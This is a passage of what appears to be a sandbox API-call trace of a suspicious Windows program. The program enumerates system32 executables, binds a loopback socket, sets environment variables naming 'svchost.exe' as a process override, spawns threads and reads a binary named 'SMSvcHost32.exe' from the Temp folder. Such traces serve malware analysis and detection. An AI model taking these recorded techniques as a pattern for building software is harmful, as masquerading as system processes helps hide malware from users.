	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.016] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] StrRChrW (lpStart="RmClient.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0070.017] FindNextFileW (in: hFindFile=0x726b80, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.017] FindClose (in: hFindFile=0x726b80 | out: hFindFile=0x726b80) returned 1
	[0070.017] GetTickCount () returned 0x253b4
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.017] GetLastError () returned 0x0
	[0070.018] GetLastError () returned 0x0
	[0070.018] GetLastError () returned 0x0
	[0070.018] GetSystemDirectoryW (in: lpBuffer=0x72ee58, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0070.018] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0070.018] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 0x726a00
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.018] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.019] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.019] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.019] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.019] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.019] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.019] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.019] FindNextFileW (in: hFindFile=0x726a00, lpFindFileData=0x72dfa0 | out: lpFindFileData=0x72dfa0) returned 1
	[0070.019] StrRChrW (lpStart="EaseOfAccessDialog.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0070.019] StrRChrW (lpStart="EhStorAuthn.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.019] GetLastError () returned 0x0
	[0070.020] ConvertStringSecurityDescriptorToSecurityDescriptorA () returned 0x1
	[0070.022] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x25af934 | out: lpWSAData=0x25af934) returned 0
	[0070.026] socket (af=2, type=1, protocol=0) returned 0x20c
	[0070.254] GetCurrentProcessId () returned 0xdb0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.254] GetLastError () returned 0x0
	[0070.255] GetLastError () returned 0x0
	[0070.255] GetLastError () returned 0x0
	[0070.255] GetLastError () returned 0x0
	[0070.255] inet_addr (cp="127.0.0.1") returned 0x100007f
	[0070.255] htons (hostshort=0x1580) returned 0x8015
	[0070.255] bind (s=0x20c, addr=0x25afac4*(sa_family=2, sin_port=0x1580, sin_addr="127.0.0.1"), namelen=16) returned 0
	[0070.255] closesocket (s=0x20c) returned 0
	[0070.255] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.256] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] wsprintfA (in: param_1=0x25afd50, param_2="%s_%d" | out: param_1="exe_scheduler_2816") returned 18
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] wsprintfA (in: param_1=0x25afd10, param_2="%d" | out: param_1="6000") returned 4
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.257] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.258] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] GetLastError () returned 0x0
	[0070.259] SetEnvironmentVariableA (lpName="standalonemtm", lpValue="true") returned 1
	[0070.259] SetEnvironmentVariableA (lpName="vendor_id", lpValue="exe_scheduler_2816") returned 1
	[0070.259] SetEnvironmentVariableA (lpName="mainprocessoverride", lpValue="svchost.exe") returned 1
	[0070.259] SetEnvironmentVariableA (lpName="RandomListenPortBase", lpValue="6000") returned 1
	[0070.259] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x409320, lpParameter=0x72b2b8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x20c
	[0070.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x406990, lpParameter=0x728250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x210
	[0070.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x414cb0, lpParameter=0x728250, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x214
	[0070.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x421ae0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x218
	[0070.261] CloseHandle (hObject=0x218) returned 1

Thread:
	id = 49
	os_tid = 0x9d8

	[0069.907] Sleep (dwMilliseconds=0xc350) 
	[0079.983] GetLastError () returned 0x57
	[0079.983] GetLastError () returned 0x57
	[0079.983] GetLastError () returned 0x57
	[0079.983] GetLastError () returned 0x57
	[0079.983] GetLastError () returned 0x57
	[0079.983] GetLastError () returned 0x57
	[0079.983] GetLastError () returned 0x57
	[0079.983] GetLastError () returned 0x57
	[0079.983] GetLastError () returned 0x57
	[0079.983] GetLastError () returned 0x57
	[0079.983] GetLastError () returned 0x57
	[0079.983] GetLastError () returned 0x57
	[0079.983] OutputDebugStringA (lpOutputString="OGG 0") 

Thread:
	id = 50
	os_tid = 0xd44

	[0070.316] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8
	[0070.316] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
	[0070.317] ReadFile (in: hFile=0x1c8, lpBuffer=0x26afd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26aff50, lpOverlapped=0x0 | out: lpBuffer=0x26afd48*, lpNumberOfBytesRead=0x26aff50*=0x200, lpOverlapped=0x0) returned 1
